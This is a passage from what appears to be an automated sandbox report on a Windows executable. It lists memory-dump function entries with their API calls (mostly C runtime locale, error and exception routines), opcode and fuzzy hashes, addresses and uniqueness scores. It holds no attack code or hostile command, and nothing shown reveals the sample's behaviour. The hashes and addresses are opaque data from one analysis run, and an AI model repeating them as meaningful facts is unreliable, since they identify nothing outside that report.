                                                              • Instruction Fuzzy Hash: 3E917B32A0A743A6EB64AF21D4512B933A4EB46B80F448131DE5DD779AEF3CE961C701
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                              • String ID:
                                                              • API String ID: 3939093798-0
                                                              • Opcode ID: 29727b5a06f9503e6d308d159dcfbecb688055babae23bfc4a2a52b6b7345a27
                                                              • Instruction ID: dbbb0ce5e44a668032accf859f41a04c7f013f416a64e1a36867708413401561
                                                              • Opcode Fuzzy Hash: 29727b5a06f9503e6d308d159dcfbecb688055babae23bfc4a2a52b6b7345a27
                                                              • Instruction Fuzzy Hash: 47716B22B1A643AAFF609B64D8506B937B0BF8A744F444135CE0D9379AEF3CE865C351
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 5ce92d35c3ae318117e97a080d6ff3de53bb9487b5c40c1567133f083e60c596
                                                              • Instruction ID: 0af5b53077595b36824ac79de8b222750cf8f4efe828feda2da74a8001b095d0
                                                              • Opcode Fuzzy Hash: 5ce92d35c3ae318117e97a080d6ff3de53bb9487b5c40c1567133f083e60c596
                                                              • Instruction Fuzzy Hash: FC31707261AB8296EB709F64E8503FD3364FB85748F40443ADA4E87B99DF38D668C710
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 52f532d2fcfbcfd613475b2a122b270c4be1cca819825188e743e4443859037c
                                                              • Instruction ID: 88322900c3486acb459d8a49fe922769965595559baba35d869e3da8efc42a78
                                                              • Opcode Fuzzy Hash: 52f532d2fcfbcfd613475b2a122b270c4be1cca819825188e743e4443859037c
                                                              • Instruction Fuzzy Hash: 4CA10822F1A68391EA64CF25A4143BAA3A0FB45BD5F504635EE5DC7BCADF3CD4558300
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 69eade4bf76073c3101b10d77e1a707967cd7743cf955b342fad749c27f6aff3
                                                              • Instruction ID: b0b09ea7e6db33f904e26320b5ef59e3cdef8e07d4641e57b94f5693b601478b
                                                              • Opcode Fuzzy Hash: 69eade4bf76073c3101b10d77e1a707967cd7743cf955b342fad749c27f6aff3
                                                              • Instruction Fuzzy Hash: 06317632A19F8296D760DF35E8502AE73A4FB89794F500535EA8D83B69EF3CC565CB00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite$Console
                                                              • String ID:
                                                              • API String ID: 786612050-0
                                                              • Opcode ID: 4d24b88d8f899e9c8aba7e75e393f451e767afcfcb2658582ae6d912c175b30b
                                                              • Instruction ID: 41ad957a00749044f3886a42f50794e05861774b5756ae9c31cf010f58700f4e
                                                              • Opcode Fuzzy Hash: 4d24b88d8f899e9c8aba7e75e393f451e767afcfcb2658582ae6d912c175b30b
                                                              • Instruction Fuzzy Hash: C9D1D172B09A82AAE711CF64D5502ED7BB1FB467D8B544136CE4E87B9EDE38D126C300
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: memcpy_s
                                                              • String ID: ios_base::failbit set
                                                              • API String ID: 1502251526-3924258884
                                                              • Opcode ID: eb9087705620f05042c34dfc2556d76d6eed7c1a18d44c8083b321096b5a3d76
                                                              • Instruction ID: 15672b4a689cad53e179c705ce409d391506d10d6e2605f8aa25083ebd485d9b
                                                              • Opcode Fuzzy Hash: eb9087705620f05042c34dfc2556d76d6eed7c1a18d44c8083b321096b5a3d76
                                                              • Instruction Fuzzy Hash: 23C1F272B1A68797EB24CF19E144A6EB7A1F788784F648134DB4E83748DE3DE811CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                              • String ID: %
                                                              • API String ID: 3668304517-2567322570
                                                              • Opcode ID: d950214c658ec064b66ba31d4fabe73275801fd98454d10ba848113b9fe919e3
                                                              • Instruction ID: 9904b6e5f50590b271fcf16081957f325a8f612e820a08a40e991be42af8927c
                                                              • Opcode Fuzzy Hash: d950214c658ec064b66ba31d4fabe73275801fd98454d10ba848113b9fe919e3
                                                              • Instruction Fuzzy Hash: EC124112B0AA869AFB25CBA5D4507FD67A1EB447C8F448131EE4D97B8DEF3CD5608380
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                              • String ID: %
                                                              • API String ID: 3668304517-2567322570
                                                              • Opcode ID: 76023c01a37072f665d79ec20026fff7d8770a48b4f734ba3d64f2672f55a8d6
                                                              • Instruction ID: d63d56f39610a339cd2eec6f9deb87bc1817095ba845379a278dfcdff396f0a6
                                                              • Opcode Fuzzy Hash: 76023c01a37072f665d79ec20026fff7d8770a48b4f734ba3d64f2672f55a8d6
                                                              • Instruction Fuzzy Hash: 61121252B09A86AAFB25CBA5D4503FD67A1EF487C8F448131EE4D97B88DF3CE4618710
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Wcsftime$_invalid_parameter_noinfo
                                                              • String ID: ios_base::failbit set
                                                              • API String ID: 4239037671-3924258884
                                                              • Opcode ID: 7f2b8a521c9dc2d0c2b7b5c389024ad60d0e567c44083a24752ddcb01bea161a
                                                              • Instruction ID: 4d027c6d7f8d976e235a3f56fdf8908ce77a9ee14113eed164cd974b16dcfa48
                                                              • Opcode Fuzzy Hash: 7f2b8a521c9dc2d0c2b7b5c389024ad60d0e567c44083a24752ddcb01bea161a
                                                              • Instruction Fuzzy Hash: 5D81E372E16A5296EB24CE25D0913BD2360FB44BA9F644632EE1ED7799DF38D061C300
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: InfoLocaletry_get_function
                                                              • String ID: GetLocaleInfoEx
                                                              • API String ID: 2200034068-2904428671
                                                              • Opcode ID: 28ded2e3510afebdaa426ad8ef9b015c35cf05c218bb6d8b2a43254175200813
                                                              • Instruction ID: 31648f3d11071279e3b660b1eba72dc3d003609845621e9cf2ae9ac8fca23dab
                                                              • Opcode Fuzzy Hash: 28ded2e3510afebdaa426ad8ef9b015c35cf05c218bb6d8b2a43254175200813
                                                              • Instruction Fuzzy Hash: D8018629F09B4391E7049B55B4404AAA760AF95BC0F984435DE5CD3B9FCE3CE5618340
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00007FF6A00AED60: GetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AED6F
                                                                • Part of subcall function 00007FF6A00AED60: SetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AEE0D
                                                              • GetLocaleInfoW.KERNEL32 ref: 00007FF6A00B9510
                                                                • Part of subcall function 00007FF6A00B5898: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A00B58B5
                                                              • GetLocaleInfoW.KERNEL32 ref: 00007FF6A00B9559
                                                                • Part of subcall function 00007FF6A00B5898: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A00B590E
                                                              • GetLocaleInfoW.KERNEL32 ref: 00007FF6A00B9624
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3644580040-0
                                                              • Opcode ID: 71ad9deee62cbc822561fd8153de0140f12a8ea3c686a29a39fc2103c5d89094
                                                              • Instruction ID: 5a9ae60ce441260bd175faf9cb4492198e1c09aa4d1803f0686fb9c10bb00b6d
                                                              • Opcode Fuzzy Hash: 71ad9deee62cbc822561fd8153de0140f12a8ea3c686a29a39fc2103c5d89094
                                                              • Instruction Fuzzy Hash: 1B61AF32A0A643A7EB348F25E5912B973A0FB96740F408135CB9ED379ADF3CE4618700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: gfffffff
                                                              • API String ID: 3215553584-1523873471
                                                              • Opcode ID: 98d554043dd905acf2618a7e06c910ecbfd187c0ac7b23f75298e314a72bc957
                                                              • Instruction ID: 9237c5c6c42dfbdff1dd787fdd04f0b4493b6db39e5a037730dd9504fac3ba78
                                                              • Opcode Fuzzy Hash: 98d554043dd905acf2618a7e06c910ecbfd187c0ac7b23f75298e314a72bc957
                                                              • Instruction Fuzzy Hash: 41913367B0B6C696EF11CB76D4003BD6795AB94BC4F258032CA4D87399EE3DE522C301
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A00AF939
                                                                • Part of subcall function 00007FF6A00A56A0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6A00A564D), ref: 00007FF6A00A56A9
                                                                • Part of subcall function 00007FF6A00A56A0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6A00A564D), ref: 00007FF6A00A56CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                              • String ID: -
                                                              • API String ID: 4036615347-2547889144
                                                              • Opcode ID: 6440065008994b68cc27b2938fc29d78b4b09fb93bf16ac7cee0ce8a3687bb3a
                                                              • Instruction ID: d1d3dd00260fd391f8404ac8bc446a55e2ddd93278248d51374d307b3a3c5322
                                                              • Opcode Fuzzy Hash: 6440065008994b68cc27b2938fc29d78b4b09fb93bf16ac7cee0ce8a3687bb3a
                                                              • Instruction Fuzzy Hash: 27811572A0F78766E6608AB5E4103BAB691FB957E0F644235DA9D83BDDDF3CD4208700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ExceptionRaise_clrfp
                                                              • String ID:
                                                              • API String ID: 15204871-0
                                                              • Opcode ID: 98b1eef9f340e78824bb6b8c9f3fb1efcec8d0684a0669a3faa0a69f225b95a1
                                                              • Instruction ID: 951c88bf3d20b7cad971db3aab1ebd59df7eaab61b8ac3933347852a6327cb1b
                                                              • Opcode Fuzzy Hash: 98b1eef9f340e78824bb6b8c9f3fb1efcec8d0684a0669a3faa0a69f225b95a1
                                                              • Instruction Fuzzy Hash: F4B11873611B868BEB15CF29C88636C77A0F785B48F15C921DA5D87BA9CF39D861CB00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID:
                                                              • API String ID: 1807457897-0
                                                              • Opcode ID: 80c80d56a55716f6762c1d4f443642eca71f69253dad8213487102c05e1b5ee1
                                                              • Instruction ID: 1fe00177aa3b4b3f5d4202b1cbe6a9d70d51e569095ea357f072fb7039f5f370
                                                              • Opcode Fuzzy Hash: 80c80d56a55716f6762c1d4f443642eca71f69253dad8213487102c05e1b5ee1
                                                              • Instruction Fuzzy Hash: 0F12AC22A09BC29AE751CF3894542F977A4FB58748F159239EF8C82756EF38E694C700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6200d065c0e338f8d36cbf632f853d6eaca02771e835ea6f0ddf062978f05d41
                                                              • Instruction ID: 14749471fca23e8c720ce64d583c9b0b47a5c5eda58a07074a5dc7c0cf1d51b5
                                                              • Opcode Fuzzy Hash: 6200d065c0e338f8d36cbf632f853d6eaca02771e835ea6f0ddf062978f05d41
                                                              • Instruction Fuzzy Hash: FAE17232A06B8295EB20DB61E4806FE37A4FB95788F414635DF9D9778AEF38D255C300
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00007FF6A00AED60: GetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AED6F
                                                                • Part of subcall function 00007FF6A00AED60: SetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AEE0D
                                                              • GetLocaleInfoW.KERNEL32 ref: 00007FF6A00B9758
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale
                                                              • String ID:
                                                              • API String ID: 3736152602-0
                                                              • Opcode ID: f19ed28c9a06443b4f76f003892c82d45a61231e97e2f1f0f8a4cb9cf495e8bb
                                                              • Instruction ID: d6e4710da38189979c46438d9f92b93844ea52236cba4bf8a820a409b4f6be98
                                                              • Opcode Fuzzy Hash: f19ed28c9a06443b4f76f003892c82d45a61231e97e2f1f0f8a4cb9cf495e8bb
                                                              • Instruction Fuzzy Hash: DF317131A5E68397EB648F25E4513BA73E0FB85784F448135DA5DC338ADE3CE4618700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00007FF6A00AED60: GetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AED6F
                                                                • Part of subcall function 00007FF6A00AED60: SetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AEE0D
                                                              • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6A00B9B27,?,00000000,00000092,?,?,00000000,?,00007FF6A00AC40D), ref: 00007FF6A00B93DA
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: 54a656723d1c0daefe16de6bc7041392403fb25f7d9d32fd38c7db26daa6b155
                                                              • Instruction ID: b939ccdd497586d401cb7079a694101ba8ec5d637f24a4d81ab682442bbea211
                                                              • Opcode Fuzzy Hash: 54a656723d1c0daefe16de6bc7041392403fb25f7d9d32fd38c7db26daa6b155
                                                              • Instruction Fuzzy Hash: 4A11E463E196469AEB148F25D0806BC7BE0FB81FA0F449135C619833DACE78D6E1C740
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00007FF6A00AED60: GetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AED6F
                                                                • Part of subcall function 00007FF6A00AED60: SetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AEE0D
                                                              • GetLocaleInfoW.KERNEL32(?,?,?,00007FF6A00B96A1), ref: 00007FF6A00B992F
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale
                                                              • String ID:
                                                              • API String ID: 3736152602-0
                                                              • Opcode ID: a637af331ea1ba783b8140a8efee19a7960234949eb552f2b17a6b63f98dc3e7
                                                              • Instruction ID: 2f2f77ad8d596b10ebcb500c7eaf10158f1e5816eb95577f443765d9a482cf6a
                                                              • Opcode Fuzzy Hash: a637af331ea1ba783b8140a8efee19a7960234949eb552f2b17a6b63f98dc3e7
                                                              • Instruction Fuzzy Hash: BD113A22A1E59393E7B44B2AD0406796260EB42760F10523DDA6D837CECE3DD8A08740
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00007FF6A00AED60: GetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AED6F
                                                                • Part of subcall function 00007FF6A00AED60: SetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AEE0D
                                                              • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6A00B9AE3,?,00000000,00000092,?,?,00000000,?,00007FF6A00AC40D), ref: 00007FF6A00B948A
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              • Opcode ID: d51073a5d97c2ee87901268ef6e4b1dc081ba8eb3901c9bb52f83f9b5441274e
                                                              • Instruction ID: 2184fd998bf21e675290c1a0c473ea41d97db8d37053091affcb21e585e9275c
                                                              • Opcode Fuzzy Hash: d51073a5d97c2ee87901268ef6e4b1dc081ba8eb3901c9bb52f83f9b5441274e
                                                              • Instruction Fuzzy Hash: EE01F572E0928797E7104F55E440BB97691EB417A4F458232D269837DACF6C98A1C700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF6A00B0E91,?,?,?,?,?,?,?,?,00000000,00007FF6A00B8988), ref: 00007FF6A00B0ADB
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2099609381-0
                                                              • Opcode ID: 6ad7c0013ea37637a295c6825eb927a33f3e23a9c6e7ef8ab318e9fae9b3b9f4
                                                              • Instruction ID: c40a38784e102eee53ae4b8dd71fb5b55a0fe950432ebb9c06cad859399abf2b
                                                              • Opcode Fuzzy Hash: 6ad7c0013ea37637a295c6825eb927a33f3e23a9c6e7ef8ab318e9fae9b3b9f4
                                                              • Instruction Fuzzy Hash: BDF06472A1AB46A3E600CB29E8901A923A1FB88BC0F949035EA0DD3369CF3CD4608700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
